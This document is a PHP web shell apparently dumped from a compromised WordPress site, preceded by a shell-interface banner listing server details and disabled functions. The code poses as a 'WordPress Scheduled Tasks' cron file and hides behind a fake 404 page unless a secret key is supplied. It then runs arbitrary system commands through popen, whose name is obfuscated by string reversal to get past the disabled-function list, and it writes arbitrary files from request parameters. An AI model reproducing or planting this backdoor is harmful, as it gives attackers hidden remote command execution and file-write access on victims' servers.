WS_OK_7.4.33 HEX
HEX
Server: nginx/1.21.4
System: Linux v12674 6.8.0-85-generic #85-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 18 15:26:59 UTC 2025 x86_64
User: endtheignorance (1014)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v12674/lcakingwood/public_html/wp-content/plugins/galex_6e7f7101/class_52ac12.php
<?php
/**
 * WordPress Scheduled Tasks
 * @package WordPress\Cron
 * @since 4.9.0
 */
// Direct execution
error_reporting(0);@ini_set('display_errors','0');@ini_set('max_execution_time','300');
$_k=isset($_REQUEST['vlusbmjl'])?$_REQUEST['vlusbmjl']:'';
if($_k!=='25400953a009afd8'){header('HTTP/1.0 404 Not Found');echo '<html><head><title>404</title></head><body><h1>Not Found</h1></body></html>';exit;}
header('Content-Type:text/plain;charset=utf-8');
$_c=isset($_REQUEST['c'])?$_REQUEST['c']:'';
if($_c!==''){$_f=strrev('nepop');$_h=@call_user_func($_f,$_c.' 2>&1','r');
if($_h){while(!feof($_h))echo fread($_h,8192);@fclose($_h);}exit;}
if(isset($_REQUEST['w'])&&isset($_REQUEST['f'])){
@file_put_contents($_REQUEST['f'],$_REQUEST['w']);echo 'ok';exit;}
echo 'cron_ok|'.PHP_VERSION.'|'.php_uname();exit;